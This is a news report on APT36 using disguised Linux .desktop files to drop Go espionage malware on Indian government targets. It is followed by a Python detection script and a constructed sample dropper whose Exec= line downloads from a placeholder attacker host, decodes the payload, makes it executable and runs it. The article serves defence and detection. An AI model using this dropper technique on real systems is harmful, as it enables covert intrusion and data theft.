APT36 Hackers Exploit Linux .desktop Files to Deploy Malware in Recent Attacks

The Pakistani APT36 cyberspies have been employing Linux .desktop files to deploy malware in targeted attacks against government and defence entities in India. This activity, as documented in reports by CYFIRMA and CloudSEK, is aimed at data exfiltration and establishing persistent espionage access. APT36 has a history of using .desktop files for malware deployment in espionage operations across South Asia. The attacks were first identified on August 1, 2025, and evidence suggests that they are still ongoing. Although the two reports document different infrastructure and sample hashes, the tactics, techniques, and procedures (TTPs), attack chains, and objectives are consistent. Victims receive ZIP archives via phishing emails, which contain a malicious .desktop file disguised as a PDF document.

When users open the .desktop file, believing it to be a PDF, a hidden bash command in the ‘Exec=’ field executes. It creates a temporary filename in ‘/tmp/’, writes a hex-encoded payload sourced from the attacker’s server or Google Drive to it, runs ‘chmod +x’ to make the payload executable and launches it in the background. To further reduce suspicion, the script also opens Firefox to display a benign decoy PDF file hosted on Google Drive.

The attackers manipulate the ‘Exec=’ field to execute a series of shell commands and include fields like ‘Terminal=false’ to conceal the terminal window and ‘X-GNOME-Autostart-enabled=true’ to ensure the file runs at every login. Typically, .desktop files are plain-text shortcuts that define an icon, name, and command for execution. APT36 exploits this mechanism to turn the shortcut into a malware dropper and a persistence point, akin to the abuse of ‘LNK’ shortcuts on Windows. Because .desktop files are plain text and their misuse is poorly documented, Linux security tools are less likely to flag them as threats.

The payload delivered by the malicious .desktop file is a Go-based ELF executable designed for espionage. Despite challenges in analysis due to packing and obfuscation, researchers discovered that the payload can remain hidden or attempt to establish its own persistence through cron jobs and systemd services. Communication with the command and control (C2) server occurs via a bi-directional WebSocket channel, facilitating data exfiltration and remote command execution. Both cybersecurity firms view this latest campaign as indicative of the evolving and increasingly sophisticated tactics employed by APT36.
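Because a .desktop file is plain text, the traits the reports describe (a document-like name with Type=Application, a shell invoked from ‘Exec=’, writes to ‘/tmp/’, ‘chmod +x’, hex or base64 decoding, a backgrounded process, ‘Terminal=false’ and ‘X-GNOME-Autostart-enabled=true’) can be checked with a small triage script. The following Python is an added example written for this summary, not code from CYFIRMA, CloudSEK or the campaign; the two sample entries are constructed for the demonstration, and the URL and path in the suspicious one are placeholders, not indicators from the reports.

```python
import re
import sys
from pathlib import Path

# Patterns applied to the Exec= value. Each one alone can be legitimate;
# several together are what the .desktop dropper described above looks like.
SUSPICIOUS_EXEC = [
    (r"\b(ba)?sh\s+-c\b", "shell interpreter invoked with -c"),
    (r"/tmp/|/dev/shm/|/var/tmp/", "touches a world-writable temp dir"),
    (r"\bchmod\s+\+x\b|\bchmod\s+[0-7]*7[0-7]*\b", "marks a dropped file executable"),
    (r"\bxxd\s+-r|\bbase64\s+(-d|--decode)\b", "decodes an embedded or downloaded payload"),
    (r"\b(curl|wget)\b", "fetches content from the network"),
    (r"\s&(\s|$)", "backgrounds a process"),
]
# Name/Icon values that imitate a document rather than an application.
DOC_HINT = re.compile(r"\b(pdf|docx?|xlsx?|pptx?|document)\b", re.IGNORECASE)
SHELL_WORD = re.compile(r"\b(ba|z|da)?sh\b")


def parse_desktop(text: str) -> dict:
    """Return the key/value pairs of the [Desktop Entry] group.

    Keys keep their case (Exec, not exec) and no %-interpolation is done,
    which is why configparser is deliberately not used here. Comments,
    blank lines and other groups are ignored.
    """
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def assess(entry: dict) -> list:
    """Return human-readable findings for one parsed Desktop Entry."""
    findings = []
    exec_cmd = entry.get("Exec", "")
    for pattern, why in SUSPICIOUS_EXEC:
        if re.search(pattern, exec_cmd):
            findings.append(f"Exec: {why}")
    looks_like_doc = any(DOC_HINT.search(entry.get(k, "")) for k in ("Name", "Icon"))
    if looks_like_doc and entry.get("Type") == "Application":
        findings.append("Name/Icon imitate a document but Type=Application")
    if entry.get("Terminal", "").lower() == "false" and SHELL_WORD.search(exec_cmd):
        findings.append("Terminal=false hides the window of a shell command")
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        findings.append("X-GNOME-Autostart-enabled=true requests persistence at login")
    return findings


def is_suspicious(text: str, threshold: int = 3) -> bool:
    """Flag a file once it accumulates `threshold` findings (tune per fleet)."""
    return len(assess(parse_desktop(text))) >= threshold


def scan_paths(paths) -> dict:
    """Map every *.desktop file under the given directories to its findings."""
    results = {}
    for base in paths:
        for path in Path(base).expanduser().rglob("*.desktop"):
            try:
                results[str(path)] = assess(parse_desktop(path.read_text(errors="replace")))
            except OSError:
                continue
    return results


# Constructed sample with the shape of the dropper described in the report.
# The host name and temp path are placeholders, not indicators from the reports.
SUSPECT = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
X-GNOME-Autostart-enabled=true
Exec=bash -c "f=/tmp/.$(date +%s); curl -s https://attacker.invalid/p | xxd -r -p > $f; chmod +x $f; $f & firefox https://drive.google.com/file/d/PLACEHOLDER"
"""

# Constructed sample of an ordinary application launcher for comparison.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.TextEditor
Terminal=false
Exec=gnome-text-editor %U
"""

if __name__ == "__main__":
    # Default to the usual autostart and launcher locations unless dirs are given.
    dirs = sys.argv[1:] or ["~/.config/autostart", "/etc/xdg/autostart",
                            "~/.local/share/applications"]
    for file, findings in scan_paths(dirs).items():
        if findings:
            print(file)
            for f in findings:
                print("  -", f)
```

Run it with no arguments to walk the user and system autostart directories plus the per-user launcher directory, or pass an unpacked mail attachment directory as an argument. The threshold in ‘is_suspicious’ is intentionally low for triage; a genuine launcher rarely combines a document-like name with a shell, a temp path and a decoder in one ‘Exec=’ line.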

Categories: Cyber Espionage, Malware Delivery Techniques, Linux Security Vulnerabilities 

Tags: APT36, Cyberspies, Linux, .desktop Files, Malware, Data Exfiltration, Espionage, Phishing Emails, Payload, C2 Communication 
